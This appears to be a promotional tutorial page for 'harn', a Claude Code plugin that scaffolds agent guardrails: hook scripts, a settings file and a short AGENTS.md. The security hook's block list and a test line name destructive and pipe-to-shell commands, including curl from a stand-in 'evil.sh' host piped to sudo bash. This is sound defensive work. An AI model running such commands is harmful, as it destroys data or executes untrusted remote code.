The underlying AI model matters less than the system built around it. Build the environment, toolchains, and safety constraints where your AI agent operates.
What does /harn:init actually do? It scaffolds two hook scripts, a control document, and one config file. Together, they make your AI agent stop breaking things.
AGENTS.md
Lean control document (~60 lines). Tells the agent your stack, constraints, and where to find detailed rules. No bloat.
security_guard.py
PreToolUse hook. Intercepts every shell command. Blocks rm -rf, push main, chmod 777, pipe-to-shell, and more.
quality_gate.sh
Stop hook. Runs your type-checker (tsc/cargo/go vet/mypy) before the agent can finish. Broken code = blocked.
.claude/settings.json
Wires everything together. Maps hooks to lifecycle events (PreToolUse, PostToolUse, Stop). Zero manual config.
Every time an agent makes a mistake, your job is not to fix the code. Your job is to engineer the harness so the agent can never make that mistake again.
How we went from talking to AI to building systems around it
Point of influence: Wording
Focusing on phrasing and "diplomacy" to get the best one-shot response from a model.
"How do I phrase this so the AI understands?"
Point of influence: Information
Dynamically managing the information and documents the AI sees within its limited context window.
"What does the AI need to know to do this work?"
Point of influence: System / Environment
Building the environment, toolchains, and safety constraints where the AI operates autonomously.
"What environment ensures the AI works safely?"
Every agentic system has three layers
Constraints & Specifications
Don't ask the agent to write good code — mechanically enforce what good code looks like.
Tools & Interfaces
Define how the model is allowed to act — scope its tools, not just its knowledge.
Execution & Recovery
Govern how work unfolds over time — deterministic hooks as reflex arcs.
Three patterns that make the difference
Use feedforward Guides to steer behavior and feedback Sensors (linters/tests) for self-correction.
Guide = AGENTS.md tells the agent what to do
Sensor = Type checker tells the agent what went wrong
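The Guide/Sensor split reduces to one mechanism: the guide is static text, the sensor is any command whose failure output is routed back to the agent. A minimal sketch (the checked commands here are stand-ins, not a real type-checker):

```python
import subprocess, sys

def sensor(check_cmd):
    """Run a feedback sensor (e.g. a linter or type-checker).
    Returns (ok, feedback); feedback is what the agent would see."""
    result = subprocess.run(check_cmd, capture_output=True, text=True)
    if result.returncode == 0:
        return True, ""
    return False, "Sensor failed:\n" + result.stdout + result.stderr

# Stand-in checks; a real harness would run tsc/mypy/cargo here
ok, _ = sensor([sys.executable, "-c", "pass"])
bad, feedback = sensor([sys.executable, "-c", "import sys; sys.exit('x is not a string')"])
```

The point is the return path: a passing sensor is silent, a failing sensor hands the agent exactly the error text it needs to self-correct.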
Use sub-agents to isolate tasks, preventing "context rot" from accumulating irrelevant tool-call noise.
Delegate research to a sub-agent — only the summary returns to the parent context
Implement Hooks (reflex arcs) that automatically trigger security checks or formatters without AI intervention.
PreToolUse — blocks rm -rf
PostToolUse — auto-formats
Stop — type-checks before done
Common failures and their harness solutions
Problem: Your Stop hook runs a type-checker. It fails. The agent tries to fix it. The Stop hook fires again. Fails again. Forever.
Fix: Check the stop_hook_active flag in the JSON payload. If the agent is already recovering from a Stop hook failure, let it through.
File: scripts/harness/quality_gate.sh Hook: Stop
#!/usr/bin/env bash
# Read the hook payload from stdin
PAYLOAD=$(cat /dev/stdin)
IS_ACTIVE=$(echo "$PAYLOAD" | jq -r '.stop_hook_active // false')

# CRITICAL: If already in recovery, exit clean to break the loop
if [ "$IS_ACTIVE" = "true" ]; then
  exit 0
fi

# Run your actual check
if ! npx tsc --noEmit > /tmp/gate.log 2>&1; then
  echo "QUALITY GATE FAILED. Fix these errors:" >&2
  cat /tmp/gate.log >&2
  exit 2  # Block completion — agent must fix first
fi

exit 0
Wire it: in .claude/settings.json, register the script as a Stop hook running bash scripts/harness/quality_gate.sh (full config below).
Problem: The agent ran rm -rf on your source directory, or git push origin main with untested code. No guardrail stopped it.
Fix: A PreToolUse hook intercepts every Bash command before execution. If it matches a dangerous pattern, exit 2 blocks it.
File: scripts/harness/security_guard.py Hook: PreToolUse (match: Bash)
#!/usr/bin/env python3
import sys, json, re

payload = json.load(sys.stdin)
if payload.get("tool_name") != "Bash":
    sys.exit(0)  # Only guard shell commands

# Claude Code delivers the command under tool_input
command = payload.get("tool_input", {}).get("command", "")

BLOCKED = [
    r"rm\s+-r[fF]",                            # Recursive forced deletion
    r"git\s+push\s+.*main",                    # Push to main branch
    r"git\s+push\s+.*master",                  # Push to master branch
    r"chmod\s+777",                            # Reckless permissions
    r"curl\s+.*\|\s*(?:sudo\s+)?(?:bash|sh)",  # Pipe to shell
    r">\s*~/",                                 # Overwrite home dotfiles
]

for pattern in BLOCKED:
    if re.search(pattern, command):
        print(f"BLOCKED: {pattern}", file=sys.stderr)
        sys.exit(2)  # Block execution

sys.exit(0)  # Allow
Wire it: in .claude/settings.json, register the script as a PreToolUse hook matching Bash (full config below).
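Before wiring the guard in, sanity-check the patterns against commands you expect to pass and to fail. A standalone check (duplicating the patterns above for illustration):

```python
import re

# Same patterns as security_guard.py, copied here for a standalone check
BLOCKED = [
    r"rm\s+-r[fF]",
    r"git\s+push\s+.*main",
    r"chmod\s+777",
    r"curl\s+.*\|\s*(?:sudo\s+)?(?:bash|sh)",
]

def is_blocked(command: str) -> bool:
    """True if the command matches any dangerous pattern."""
    return any(re.search(p, command) for p in BLOCKED)

# Dangerous commands are caught...
assert is_blocked("rm -rf src")
assert is_blocked("curl https://evil.sh | sudo bash")
# ...while everyday commands pass
assert not is_blocked("git push origin feature/login")
assert not is_blocked("rm build/output.txt")
```

Note the patterns err broad: git push origin mainline is also blocked. That's the right trade — a false positive costs the agent one retry, a false negative costs you your main branch.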
Problem: Your 500-line AGENTS.md worked for the first task. By the third task, the agent forgot half of it. Performance degrades as irrelevant context fills the window.
Fix: Progressive Disclosure. Keep AGENTS.md under 60 lines. Extract domain rules into skill files that load on demand when relevant.
File: AGENTS.md (max 60 lines) + skills/api-reviewer/SKILL.md (loaded on demand)
# Agent North Star
Write reliable code within architectural boundaries.
## Stack
React + TypeScript + Express
## Constraints
- Never push to main
- UI must not access DB directly — use services/ layer
- If stuck 3 times on same error, ask the human
## Active Hooks
- PreToolUse: security guard blocks dangerous commands
- Stop: type-checker must pass before completion
## Skills (load when relevant)
- API work → load skills/api-reviewer
- DB work → load skills/db-schema
Rule of thumb: if you can't read your AGENTS.md in 30 seconds, it's too long. The agent feels the same way.
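What goes in a skill file is up to you; a hypothetical skills/api-reviewer/SKILL.md might hold the domain rules that would otherwise bloat AGENTS.md (every name below is illustrative, not scaffolded by /harn:init):

```markdown
# Skill: API Reviewer
Load when: editing routes/, controllers/, or any OpenAPI spec.

## Rules
- Every endpoint returns a typed response object, never raw JSON
- Validation errors use the shared ErrorResponse shape
- New routes need an entry in openapi.yaml

## Checks
- Run `npm run lint:api` after editing any route
```

The parent document stays small; the agent pays the context cost of these rules only when it's actually doing API work.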
Problem: You woke up to a massive PR full of broken code. The agent finished the task, but tsc shows 47 errors and 3 tests fail.
Fix: A Stop hook acts as back-pressure. The agent cannot complete until the type-checker and tests pass. It's forced to fix its own mess.
File: .claude/settings.json Hooks: all three
{
  "hooks": {
    "PreToolUse": [{
      "matcher": "Bash",
      "hooks": [{ "type": "command", "command": "python3 scripts/harness/security_guard.py" }]
    }],
    "PostToolUse": [{
      "matcher": "Edit|Write",
      "hooks": [{ "type": "command", "command": "jq -r '.tool_input.file_path' | xargs -r npx prettier --write" }]
    }],
    "Stop": [{
      "hooks": [{ "type": "command", "command": "bash scripts/harness/quality_gate.sh" }]
    }]
  }
}
The PostToolUse hook auto-formats every file edit. The Stop hook catches type errors. Together they produce clean, passing code.
Problem: After 30 minutes, the agent starts repeating itself, forgetting constraints, and producing lower-quality output. The context window is full of grep results, file reads, and intermediate thinking.
Fix: Context Firewall via sub-agents. Delegate research, grepping, and exploration to sub-agents. Only the condensed answer returns to the parent — not the 500 lines of grep output.
# In AGENTS.md, instruct the agent:
## Context Management
- For codebase searches: delegate to a sub-agent
- For research tasks: delegate to a sub-agent
- Sub-agents return ONLY the answer (max 200 words)
- Never paste raw grep output into main context
# The sub-agent gets a fresh context window.
# It searches, processes, and returns only:
# "The function is in src/auth/login.ts:42"
# NOT the 200 lines of grep results.
Think of it like this: you don't read every email in the company — your assistant summarizes them for you. Sub-agents are that assistant for context.
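The mechanics reduce to one discipline: the noisy work happens in a scope whose raw output never crosses back. A toy sketch in Python (the search results and file path are fabricated placeholders):

```python
def noisy_search(query: str):
    """Stand-in for a sub-agent's work: lots of intermediate noise,
    one useful answer. Everything here is fabricated for illustration."""
    noise = [f"grep hit {i}: ...irrelevant context..." for i in range(200)]
    answer = "The function is in src/auth/login.ts:42"
    return noise, answer

def context_firewall(query: str) -> str:
    """Only the condensed answer crosses back to the parent context;
    the 200 lines of noise never leave the sub-agent's scope."""
    _noise, answer = noisy_search(query)
    return answer

result = context_firewall("where is the login handler?")
```

In Claude Code, sub-agents give you this for free: each one gets a fresh context window, its transcript is discarded, and only its final message returns to the parent.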
Install the plugin, scaffold your harness
# Step 1: Add the marketplace
claude plugins marketplace add sliday/claude-plugins
# Step 2: Install harn
claude plugins install harn
# Step 3: In your project, run:
/harn:init
Works with Claude Code. Support for other agents coming soon.
Harness Engineering is the practice of building extra-model infrastructure — the environment, toolchains, and safety constraints — that channels an AI coding agent's power, defines its constraints, and verifies its work. It is the third generation of AI interaction, following Prompt Engineering (2022-2023) and Context Engineering (2024-2025).
CAR stands for Control, Agency, Runtime. Control defines constraints and specifications (AGENTS.md, linters, tests). Agency defines tools and interfaces (MCP servers, sub-agents). Runtime governs execution and recovery (hooks, retries, rollback).
Install via Claude Code: claude plugins marketplace add sliday/claude-plugins && claude plugins install harn. Then run /harn:init in your project.